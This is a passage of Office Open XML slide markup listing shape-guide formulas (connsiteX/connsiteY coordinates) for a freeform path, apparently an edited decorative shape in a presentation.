              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1491612 w 1491612"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 228306 w 1491612"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 264899 w 1491612"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 276399 w 1491612"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 301138 w 1491612"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 278695 w 1491612"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 293786 w 1491612"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 311230 w 1491612"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 325270 w 1491612"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 378227 w 1491612"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 393914 w 1491612"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 437619 w 1491612"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 420842 w 1491612"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 398257 w 1491612"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 405421 w 1491612"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 388166 w 1491612"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 415194 w 1491612"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 393186 w 1491612"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 391984 w 1491612"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 407399 w 1491612"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 394786 w 1491612"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 380015 w 1491612"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 429527 w 1491612"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408602 w 1491612"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 448194 w 1491612"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 495324 w 1491612"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 508892 w 1491612"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 524873 w 1491612"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 558366 w 1491612"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 567965 w 1491612"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 579191 w 1491612"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 580211 w 1491612"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 587552 w 1491612"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 590855 w 1491612"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 591839 w 1491612"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 587473 w 1491612"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 594150 w 1491612"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 591083 w 1491612"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 597913 w 1491612"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 604949 w 1491612"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 607680 w 1491612"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 604384 w 1491612"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 605938 w 1491612"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 612847 w 1491612"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 608703 w 1491612"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 624106 w 1491612"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 630009 w 1491612"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 634742 w 1491612"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 636035 w 1491612"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 633842 w 1491612"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 629322 w 1491612"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 624405 w 1491612"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 620970 w 1491612"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 601623 w 1491612"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 605696 w 1491612"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 590952 w 1491612"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 592101 w 1491612"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 590677 w 1491612"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 576972 w 1491612"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 578570 w 1491612"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 571992 w 1491612"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 573323 w 1491612"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 577677 w 1491612"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 582755 w 1491612"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 605349 w 1491612"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 604774 w 1491612"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 605081 w 1491612"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 605108 w 1491612"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 603723 w 1491612"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 602607 w 1491612"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 604340 w 1491612"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 608083 w 1491612"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 607549 w 1491612"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 616245 w 1491612"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 623591 w 1491612"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 622887 w 1491612"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 626330 w 1491612"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 633868 w 1491612"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 635539 w 1491612"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 653102 w 1491612"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 653527 w 1491612"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 655350 w 1491612"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 642185 w 1491612"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 642686 w 1491612"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 630286 w 1491612"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 615471 w 1491612"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 616136 w 1491612"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 607004 w 1491612"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 593613 w 1491612"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 566343 w 1491612"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 508957 w 1491612"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 457875 w 1491612"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 437969 w 1491612"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 428692 w 1491612"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 415653 w 1491612"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 421652 w 1491612"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 424264 w 1491612"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 400593 w 1491612"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 390480 w 1491612"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 374697 w 1491612"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 372155 w 1491612"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 373148 w 1491612"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 364954 w 1491612"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 346132 w 1491612"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 322689 w 1491612"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 276488 w 1491612"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 248799 w 1491612"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 247925 w 1491612"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 228720 w 1491612"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 241800 w 1491612"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 234542 w 1491612"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 220627 w 1491612"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 228934 w 1491612"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 230122 w 1491612"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 234807 w 1491612"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 227089 w 1491612"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 216395 w 1491612"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 205131 w 1491612"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 206587 w 1491612"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 208823 w 1491612"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 201452 w 1491612"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 170860 w 1491612"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 149810 w 1491612"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 149368 w 1491612"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 135039 w 1491612"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 120458 w 1491612"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 125469 w 1491612"/>
              <a:gd name="connsiteY128" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 111411 w 1491612"/>
              <a:gd name="connsiteY129" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 111092 w 1491612"/>
              <a:gd name="connsiteY130" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 90718 w 1491612"/>
              <a:gd name="connsiteY131" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 89966 w 1491612"/>
              <a:gd name="connsiteY132" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 72889 w 1491612"/>
              <a:gd name="connsiteY133" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 73264 w 1491612"/>
              <a:gd name="connsiteY134" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 53221 w 1491612"/>
              <a:gd name="connsiteY135" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 19525 w 1491612"/>
              <a:gd name="connsiteY136" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 7008 w 1491612"/>
              <a:gd name="connsiteY137" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 2385 w 1491612"/>
              <a:gd name="connsiteY138" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 164830 w 1491612"/>
              <a:gd name="connsiteY139" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 158408 w 1485190"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1485190 w 1485190"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1485190 w 1485190"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 221884 w 1485190"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 258477 w 1485190"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 269977 w 1485190"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 294716 w 1485190"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 272273 w 1485190"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 287364 w 1485190"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 304808 w 1485190"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 318848 w 1485190"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 371805 w 1485190"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 387492 w 1485190"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 431197 w 1485190"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 414420 w 1485190"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 391835 w 1485190"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 398999 w 1485190"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 381744 w 1485190"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 408772 w 1485190"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 386764 w 1485190"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 385562 w 1485190"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 400977 w 1485190"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 388364 w 1485190"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 373593 w 1485190"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423105 w 1485190"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 402180 w 1485190"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 441772 w 1485190"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 488902 w 1485190"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 502470 w 1485190"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 518451 w 1485190"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 551944 w 1485190"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 561543 w 1485190"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 572769 w 1485190"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 573789 w 1485190"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 581130 w 1485190"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 584433 w 1485190"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 585417 w 1485190"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 581051 w 1485190"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 587728 w 1485190"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 584661 w 1485190"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 591491 w 1485190"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 598527 w 1485190"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 601258 w 1485190"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 597962 w 1485190"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 599516 w 1485190"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 606425 w 1485190"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 602281 w 1485190"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 617684 w 1485190"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 623587 w 1485190"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 628320 w 1485190"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 629613 w 1485190"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 627420 w 1485190"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 622900 w 1485190"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 617983 w 1485190"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 614548 w 1485190"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 595201 w 1485190"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 599274 w 1485190"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 584530 w 1485190"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 585679 w 1485190"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 584255 w 1485190"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 570550 w 1485190"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 572148 w 1485190"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 565570 w 1485190"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 566901 w 1485190"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 571255 w 1485190"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 576333 w 1485190"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 598927 w 1485190"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 598352 w 1485190"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 598659 w 1485190"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 598686 w 1485190"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 597301 w 1485190"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 596185 w 1485190"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 597918 w 1485190"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
